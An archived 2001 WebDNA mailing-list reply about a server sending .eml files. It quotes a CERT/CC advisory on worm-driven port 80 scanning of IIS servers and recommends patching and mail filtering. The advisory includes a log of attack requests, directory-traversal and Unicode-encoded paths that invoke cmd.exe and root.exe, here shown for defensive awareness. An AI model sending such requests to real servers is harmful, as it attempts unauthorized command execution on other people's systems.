Re: .eml files

This WebDNA talk-list message is from

2001


It keeps the original formatting.
numero = 38666
interpreted = N
texte = On 9/18/01 2:43 PM, Jeff - Sourcestudios.com wrote:> Our server has been going crazy send out these .eml files. They seem to be > all over the place. > > Anyone else experiencing this or any knowledge of this? > > Running NT 4.0, webcat 4.02rc2http://vil.mcafee.com/dispVirus.asp?virus_k=99209 http://news.cnet.com/news/0-1003-200-7215349.html?tag=lthd >From cert.org:http://www.cert.org/current/current_activity.htmlIncrease in Port 80 (HTTP) scanning activity This morning (September 18th) the CERT/CC started receiving reports of a massive increase in scanning directed at port 80 (HTTP). Reports indicate that this scanning activity is attempting to exploit systems previously compromised by Code Red II and/or the sadmind/IIS worm as well as other known vulnerabilities in Microsoft Internet Information Server (IIS). Please see CERT Vulnerability Note VU#111677 for information on the type of vulnerability being exploited.The following is a log excerpt of this scanning activity:GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/sy stem32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir The CERT/CC has also received reports of a possibly new piece of malicious code named readme.exe being sent via email. Preliminary analysis indicates that this file may be related to the increase in port 80 scanning activity.Sites are encouraged to verify the state of security patches on all IIS servers and email client software. Administrators may also want to add filters to mail servers to block the readme.exe attachment. In addition, sites may wish to notify users of the existence of readme.exe and its potential threat. Robert Minor Director of Internet Services ------------------------------------------------------------ Cybermill Communications http://www.cybermill.com http://www.merchantmaker.comProviding Ecommerce and interactive website development and hosting services on Macintosh, Windows NT, Unix, and AS/400.All your websites are belong to us! ------------------------------------------------------------- This message is sent to you because you are subscribed to the mailing list . To unsubscribe, E-mail to: To switch to the DIGEST mode, E-mail to Web Archive of this list is at: http://search.smithmicro.com/ Associated Messages, from the most recent to the oldest:

    
  1. Re: .eml files (John Peacock 2001)
  2. Re: .eml files (Brian B. Burton 2001)
  3. Re: .eml files (Robert Kudrle 2001)
  4. Re: .eml files (Robert Kudrle 2001)
  5. Re: .eml files (Glenn Busbin 2001)
  6. Re: .eml files (Jeff - Sourcestudios.com 2001)
  7. Re: .eml files (Charles Kline 2001)
  8. Re: .eml files (Bob Minor 2001)
  9. Re: .eml files ( 2001)
  10. Re: .eml files (Bob Minor 2001)
  11. .eml files (Jeff - Sourcestudios.com 2001)
On 9/18/01 2:43 PM, Jeff - Sourcestudios.com wrote:> Our server has been going crazy send out these .eml files. They seem to be > all over the place. > > Anyone else experiencing this or any knowledge of this? > > Running NT 4.0, webcat 4.02rc2http://vil.mcafee.com/dispVirus.asp?virus_k=99209 http://news.cnet.com/news/0-1003-200-7215349.html?tag=lthd >From cert.org:http://www.cert.org/current/current_activity.htmlIncrease in Port 80 (HTTP) scanning activity This morning (September 18th) the CERT/CC started receiving reports of a massive increase in scanning directed at port 80 (HTTP). Reports indicate that this scanning activity is attempting to exploit systems previously compromised by Code Red II and/or the sadmind/IIS worm as well as other known vulnerabilities in Microsoft Internet Information Server (IIS). Please see CERT Vulnerability Note VU#111677 for information on the type of vulnerability being exploited.The following is a log excerpt of this scanning activity:GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/sy stem32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir The CERT/CC has also received reports of a possibly new piece of malicious code named readme.exe being sent via email. Preliminary analysis indicates that this file may be related to the increase in port 80 scanning activity.Sites are encouraged to verify the state of security patches on all IIS servers and email client software. Administrators may also want to add filters to mail servers to block the readme.exe attachment. In addition, sites may wish to notify users of the existence of readme.exe and its potential threat. Robert Minor Director of Internet Services ------------------------------------------------------------ Cybermill Communications http://www.cybermill.com http://www.merchantmaker.comProviding Ecommerce and interactive website development and hosting services on Macintosh, Windows NT, Unix, and AS/400.All your websites are belong to us! ------------------------------------------------------------- This message is sent to you because you are subscribed to the mailing list . To unsubscribe, E-mail to: To switch to the DIGEST mode, E-mail to Web Archive of this list is at: http://search.smithmicro.com/ Bob Minor

DOWNLOAD WEBDNA NOW!

Top Articles:

Talk List

The WebDNA community talk-list is the best place to get some help: several hundred extremely proficient programmers with an excellent knowledge of WebDNA and an excellent spirit will deliver all the tips and tricks you can imagine...

Related Readings:

WebCatalog 4.0.1b2 is now available (2000) with Link i need to (1997) Yet another db manager (2004) WebCat2b13MacPlugIn - syntax to convert date (1997) Fwd: Problems with Webcatalog Plug-in (1997) Re:[showif] and equality (1998) WebCommerce: Folder organization ? (1997) Re:2nd WebCatalog2 Feature Request (1996) verify online (1997) OT: Prevent Caching js Files (2003) MATH PROBLEM (1997) Emailer connect failure definitions (2003) Search design (1997) Location of Browser Info.txt file (1997) bug in wn searching NT version? (1997) 4.5's frequency of math problem running as demo? (2002) [math date]: Arrrggh! (2003) [AppendFile] problem (WebCat2b13 Mac .acgi) (1997) [ReturnRaw] and hiding FORM data (2003) Alternating colors (1997)